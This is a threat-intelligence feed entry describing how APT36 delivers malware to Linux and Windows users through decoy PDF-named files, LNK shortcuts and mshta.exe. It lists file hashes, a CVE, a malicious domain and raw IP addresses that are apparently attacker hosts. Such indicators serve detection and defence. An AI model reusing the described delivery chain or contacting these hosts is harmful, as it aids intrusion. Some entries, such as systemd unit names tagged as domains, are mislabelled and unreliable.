← Back to Pulse Feed
PULSE DETAIL
APT36 has been observed utilizing two distinct methods to execute malware on Linux and Windows platforms, focusing on the distribution of malicious files disguised as legitimate documents.
On Linux, the attack begins with the creation of a `.local` directory with specific permissions (0755), followed by downloading three files from a target URL: `gkt3.1`, `http://gkt3.sh`, and `APPL FOR UPDATION.pdf`. The `http://gkt3.sh` script is executed after this download, which subsequently utilizes the `xdg-open` command to open the PDF file, potentially leading to further exploitation or malware execution.
Conversely, on Windows platforms, APT36 employs a malicious shortcut (LNK file) named `APPL FOR UPDATION OF NAME BASED & OFFICIAL NIC E-MAIL ID.pdf.LNK`. This file initiates the execution of embedded code through the use of the `mshta.exe` tool, a legitimate Windows system application.
Indicators of Compromise (50)
| TYPE | INDICATOR | DESCRIPTION | CREATED | |
|---|---|---|---|---|
| domain | innlive.in | — | 2025-12-21 | |
| CVE | CVE-2025-8088 | — | 2025-12-21 | |
| FileHash-MD5 | 1426bdff1ef4466c37631a51c2ba6e48 | — | 2025-12-21 | |
| FileHash-MD5 | 180c88e45db8a2bcc095f32ca71ab8f6 | — | 2025-12-21 | |
| FileHash-MD5 | 24e010830cbb42384bf609f8acf91c46 | — | 2025-12-21 | |
| FileHash-MD5 | 30fda797535a0f367ea2809426760020 | — | 2025-12-21 | |
| FileHash-MD5 | 403ea69b8b75e16a644d12053eb2659a | — | 2025-12-21 | |
| FileHash-MD5 | 40ef50cc91a890ecb7726a72fe130424 | — | 2025-12-21 | |
| FileHash-MD5 | 57ba3d1bfc8724668c52b98908bf159a | — | 2025-12-21 | |
| FileHash-MD5 | 5a9552f5d8bb031358cbacf827624186 | — | 2025-12-21 | |
| FileHash-MD5 | 689af44a940f293ea659603aee2323b3 | — | 2025-12-21 | |
| FileHash-MD5 | 75245a9be77dc6014e079cf249a98ab3 | — | 2025-12-21 | |
| FileHash-MD5 | 813b69e1ffeb70cdd5a63a8103a896d3 | MD5 of 6cadcdb2c2cd1425a44fe08e00c4cfcff9498ee0 | 2025-12-21 | |
| FileHash-MD5 | 90796ed66e7f5f36b6317e6bdf9718ce | — | 2025-12-21 | |
| FileHash-MD5 | a4f1cc3537eb8dd669c3cc16cdf7b798 | — | 2025-12-21 | |
| FileHash-MD5 | a53b1134f5bad31b407f5f597fd1cfa3 | — | 2025-12-21 | |
| FileHash-MD5 | c345c4a04df2d324f594e2ae9040daf8 | — | 2025-12-21 | |
| FileHash-MD5 | ceb715db684199958aa5e6c05dc5c7f0 | — | 2025-12-21 | |
| FileHash-MD5 | de035f212161f33accc610793fdcaa67 | MD5 of e0e89ee546fe04498aee0e1deb33e0b47ba8708a | 2025-12-21 | |
| FileHash-SHA1 | 149208f87c68cbb540255f9a079426e9d39b1840 | SHA1 of ceb715db684199958aa5e6c05dc5c7f0 | 2025-12-21 | |
| FileHash-SHA1 | 1d91fff766d4e86c5bb191d766eeb9257fe1eca5 | SHA1 of 403ea69b8b75e16a644d12053eb2659a | 2025-12-21 | |
| FileHash-SHA1 | 23ba373cdfaa29e8fed0d08d20bcda0b9fe86a43 | SHA1 of 24e010830cbb42384bf609f8acf91c46 | 2025-12-21 | |
| FileHash-SHA1 | 37611bedc83d02ec020c898f874a8a9c67512b80 | SHA1 of 180c88e45db8a2bcc095f32ca71ab8f6 | 2025-12-21 | |
| FileHash-SHA1 | 6cadcdb2c2cd1425a44fe08e00c4cfcff9498ee0 | — | 2025-12-21 | |
| FileHash-SHA1 | 7bd6e16e77c4c95a1cb2654bf3270334714fc9a5 | SHA1 of 30fda797535a0f367ea2809426760020 | 2025-12-21 | |
| FileHash-SHA1 | 93eb30589e7881dbd9932a171d0406e592af2075 | SHA1 of c345c4a04df2d324f594e2ae9040daf8 | 2025-12-21 | |
| FileHash-SHA1 | 9625d4002298ba23506caf0606cb952cc945d3e6 | SHA1 of 40ef50cc91a890ecb7726a72fe130424 | 2025-12-21 | |
| FileHash-SHA1 | c0d129b836490e51307cd6e911e559f805dc91ba | SHA1 of 75245a9be77dc6014e079cf249a98ab3 | 2025-12-21 | |
| FileHash-SHA1 | da3d3f1af42fe9c54d97218b2a3bd82e7ed045ef | SHA1 of 1426bdff1ef4466c37631a51c2ba6e48 | 2025-12-21 | |
| FileHash-SHA1 | e0e89ee546fe04498aee0e1deb33e0b47ba8708a | — | 2025-12-21 | |
| FileHash-SHA256 | 06fb22c743fcc949998e280bd5deaf8f80d616b371576b5e11fd5b1d3b23a5f2 | SHA256 of 30fda797535a0f367ea2809426760020 | 2025-12-21 | |
| FileHash-SHA256 | 0df9cb5b73822a8a44d0122fad943f376a5e5d7bbb927bc86743dff0379fa3fc | SHA256 of 180c88e45db8a2bcc095f32ca71ab8f6 | 2025-12-21 | |
| FileHash-SHA256 | 0f4e3711c8b9ca49584d924f62c6d2e48d88f60583cf3d3db8300d1246bdb2aa | SHA256 of 24e010830cbb42384bf609f8acf91c46 | 2025-12-21 | |
| FileHash-SHA256 | 1acc44199d82bc58fb788c4db6f1edd18744060b1e5666023c683c074fd1ebab | SHA256 of 75245a9be77dc6014e079cf249a98ab3 | 2025-12-21 | |
| FileHash-SHA256 | 2592a19569dc0635adb175b8e3732b1c0aa43a3055227b10be98760cfbea43fa | SHA256 of 403ea69b8b75e16a644d12053eb2659a | 2025-12-21 | |
| FileHash-SHA256 | 4281ce14c506107b645ed84018feee5e59612e7cc8b7b11af2cd6683270b68bf | SHA256 of c345c4a04df2d324f594e2ae9040daf8 | 2025-12-21 | |
| FileHash-SHA256 | 4a091d21c18682b1fcb5d9bc097eb57d546be09cdf3594da159c4551cbe7dbe8 | SHA256 of 40ef50cc91a890ecb7726a72fe130424 | 2025-12-21 | |
| FileHash-SHA256 | 553d245ae07eb39a9bfec74b64507d66e4aa2817b101fdddbd699dd9a079fa84 | SHA256 of e0e89ee546fe04498aee0e1deb33e0b47ba8708a | 2025-12-21 | |
| FileHash-SHA256 | b4c4e5e3d334ca1dc4f64435656f0aa011c8651cd4343707d0397ee9dc6c41e5 | SHA256 of 6cadcdb2c2cd1425a44fe08e00c4cfcff9498ee0 | 2025-12-21 | |
| FileHash-SHA256 | c1f3dea00caec58c9e0f990366ff40ae59e93f666f92e1c218c03478bf3abe17 | SHA256 of ceb715db684199958aa5e6c05dc5c7f0 | 2025-12-21 | |
| FileHash-SHA256 | d35deed09228159b8f60a0deccf6810ea8214715b305042577c7415563dcd0f3 | SHA256 of 1426bdff1ef4466c37631a51c2ba6e48 | 2025-12-21 | |
| URL | http://164.215.103.230:20145 | — | 2025-12-21 | |
| URL | http://2.56.10.86:8621 | — | 2025-12-21 | |
| URL | http://65.109.190.120:8951 | — | 2025-12-21 | |
| URL | http://www.anquanke.com/post/id/269526 | — | 2025-12-21 | |
| URL | http://www.cyfirma.com/research/apt36-python-based-elf-malware-targeting-indian-government-entities/ | — | 2025-12-21 | |
| URL | http://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/ | — | 2025-12-21 | |
| URL | https://innlive.in/assets/public/01/app/ | — | 2025-12-21 | |
| domain | default.target | — | 2025-12-21 | |
| domain | network.target | — | 2025-12-21 |
References (1)